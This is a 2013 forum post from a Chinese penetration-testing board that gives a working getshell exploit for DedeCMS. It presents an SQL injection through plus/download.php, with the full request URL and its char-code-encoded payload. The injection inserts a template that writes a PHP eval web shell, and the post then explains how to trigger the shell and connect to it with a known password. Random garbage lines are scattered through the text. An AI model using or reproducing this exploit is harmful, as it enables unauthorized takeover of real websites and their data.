中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
6 x0 S+ }5 {5 e4 f6 R! Z
2 Y# O" S# \1 R5 C/ t
- M$ K6 v% p( F. }9 i1 E5 e0 ]+ }
作者:鬼哥
. R# v9 |8 C5 L1 P
! j; R8 ~' b% M: Z( z
看贴不回,没JJ
8 z4 f1 E+ w9 q v
8 H9 o+ z, Y& y1 K
漏洞大家都知道是哪个。
1 b8 K! x& L A& d; S/ |7 G4 l) I
7 P8 F+ O9 a$ g0 Q- I
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
: K+ d; q3 v1 I7 ]
8 K+ i0 k* Q$ _0 ]/ l
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
; s, F1 X' i, X% C/ H/ Z0 b) n1 G
8 J" J: G* `( Z e
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
7 A2 x- P/ k- c2 \3 B
) w5 F$ X: y9 \6 F. I; W: Z
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
$ K O) d- Z8 K- |2 i8 |
4 I1 o# @% Y. u5 N/ J( b+ \
但是测试了下。。失败
- K- P6 d$ X x5 u/ ^
9 l4 S- w& a# x6 h7 m: L0 b& V) h9 w& T
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
. v, f( R d' u8 I" C
% c0 v4 m3 E0 J M, [
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
( s( T6 p5 W( G' g
9 _8 G& D2 F5 C8 c I
EXP:
) d) h: x K. m- ~
+ ]' o$ n A9 S% @- w1 m: a
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
v' y+ E! B8 j( \; y* Y9 f/ |
M6 V+ W. `4 N% h7 r6 |8 }
: {1 f' ] o9 N
成功增加。
9 w: b9 V9 r# a/ b4 [2 y
1 q# z2 z1 i. ^! N2 j
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
! i" K5 ?4 g( ]" P
生成一句话木马.
5 q ?7 p+ m$ z) L! I* J% Q
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
6 \' Z N: L; A& z, x7 k
( [. L4 h v0 z; n1 }
测试OK。
$ U) Q" ]5 h# c
& r% k$ W: C+ d( s/ w$ M# c
: ` N+ L9 e* c& q! ]: E3 E) h
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2